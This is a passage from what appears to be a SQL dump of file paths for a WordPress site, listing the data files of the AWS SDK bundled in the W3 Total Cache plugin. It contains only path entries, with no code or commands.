.php'),(5833,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-1.json.php'),(5834,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-2.json.php'),(5835,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ebs/2019-11-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ebs/2019-11-02/api-2.json.php'),(5836,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ebs/2019-11-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ebs/2019-11-02/paginators-1.json.php'),(5837,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/api-2.json.php'),(5838,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/paginators-1.json.php'),(5839,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-1.json.php'),(5840,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-2.json.php'),(5841,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/api-2.json.php'),(5842,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/paginators-1.json.php'),(5843,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/waiters-2.json.php'),(5844,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/api-2.json.php'),(5845,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/paginators-1.json.php'),(5846,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-1.json.php'),(5847,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-2.json.php'),(5848,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/api-2.json.php'),(5849,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/paginators-1.json.php'),(5850,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/smoke.json.php'),(5851,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-1.json.php'),(5852,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-2.json.php'),(5853,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/api-2.json.php'),(5854,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/paginators-1.json.php'),(5855,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/api-2.json.php'),(5856,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/paginators-1.json.php'),(5857,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/smoke.json.php'),(5858,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/waiters-2.json.php'),(5859,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/api-2.json.php'),(5860,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/paginators-1.json.php'),(5861,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/api-2.json.php'),(5862,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/paginators-1.json.php'),(5863,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/smoke.json.php'),(5864,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/waiters-2.json.php'),(5865,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/api-2.json.php'),(5866,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/paginators-1.json.php'),(5867,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/waiters-2.json.php'),(5868,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/api-2.json.php'),(5869,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/paginators-1.json.php'),(5870,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/api-2.json.php'),(5871,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/paginators-1.json.php'),(5872,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/smoke.json.php'),(5873,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/waiters-2.json.php'),(5874,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/api-2.json.php'),(5875,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/paginators-1.json.php'),(5876,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/smoke.json.php'),(5877,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticbeanstalk/2010-12-01/waiters-2.json.php'),(5878,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/api-2.json.php'),(5879,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/paginators-1.json.php'),(5880,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticfilesystem/2015-02-01/smoke.json.php'),(5881,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/api-2.json.php'),(5882,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/paginators-1.json.php'),(5883,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/smoke.json.php'),(5884,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01/waiters-2.json.php'),(5885,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/api-2.json.php'),(5886,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/paginators-1.json.php'),(5887,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/smoke.json.php'),(5888,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticloadbalancingv2/2015-12-01/waiters-2.json.php'),(5889,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/api-2.json.php'),(5890,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/paginators-1.json.php'),(5891,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/smoke.json.php'),(5892,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticmapreduce/2009-03-31/waiters-2.json.php'),(5893,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/api-2.json.php'),(5894,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/paginators-1.json.php'),(5895,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/smoke.json.php'),(5896,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-1.json.php'),(5897,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25/waiters-2.json.php'),(5898,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/api-2.json.php'),(5899,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/paginators-1.json.php'),(5900,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/smoke.json.php'),(5901,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-1.json.php'),(5902,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/email/2010-12-01/waiters-2.json.php'),(5903,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/api-2.json.php'),(5904,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/emr-containers/2020-10-01/paginators-1.json.php'),(5905,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints.json.php'),(5906,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints_prefix_history.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/endpoints_prefix_history.json.php'),(5907,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/entitlement.marketplace/2017-01-11/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/entitlement.marketplace/2017-01-11/api-2.json.php'),(5908,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/entitlement.marketplace/2017-01-11/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/entitlement.marketplace/2017-01-11/paginators-1.json.php'),(5909,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/es/2015-01-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/es/2015-01-01/api-2.json.php'),(5910,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/es/2015-01-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/es/2015-01-01/paginators-1.json.php'),(5911,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/es/2015-01-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/es/2015-01-01/smoke.json.php'),(5912,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eventbridge/2015-10-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eventbridge/2015-10-07/api-2.json.php'),(5913,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eventbridge/2015-10-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eventbridge/2015-10-07/paginators-1.json.php'),(5914,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eventbridge/2015-10-07/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eventbridge/2015-10-07/smoke.json.php'),(5915,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/events/2015-10-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/events/2015-10-07/api-2.json.php'),(5916,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/events/2015-10-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/events/2015-10-07/paginators-1.json.php'),(5917,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/events/2015-10-07/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/events/2015-10-07/smoke.json.php'),(5918,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace/2021-03-12/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace/2021-03-12/api-2.json.php'),(5919,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace/2021-03-12/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace/2021-03-12/paginators-1.json.php'),(5920,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace-data/2020-07-13/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace-data/2020-07-13/api-2.json.php'),(5921,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace-data/2020-07-13/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/finspace-data/2020-07-13/paginators-1.json.php'),(5922,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/api-2.json.php'),(5923,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/paginators-1.json.php'),(5924,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/firehose/2015-08-04/smoke.json.php'),(5925,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fis/2020-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fis/2020-12-01/api-2.json.php'),(5926,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fis/2020-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fis/2020-12-01/paginators-1.json.php'),(5927,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fms/2018-01-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fms/2018-01-01/api-2.json.php'),(5928,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fms/2018-01-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fms/2018-01-01/paginators-1.json.php'),(5929,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/api-2.json.php'),(5930,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecast/2018-06-26/paginators-1.json.php'),(5931,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/api-2.json.php'),(5932,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/forecastquery/2018-06-26/paginators-1.json.php'),(5933,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/api-2.json.php'),(5934,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/frauddetector/2019-11-15/paginators-1.json.php'),(5935,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/api-2.json.php'),(5936,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/fsx/2018-03-01/paginators-1.json.php'),(5937,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/api-2.json.php'),(5938,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/paginators-1.json.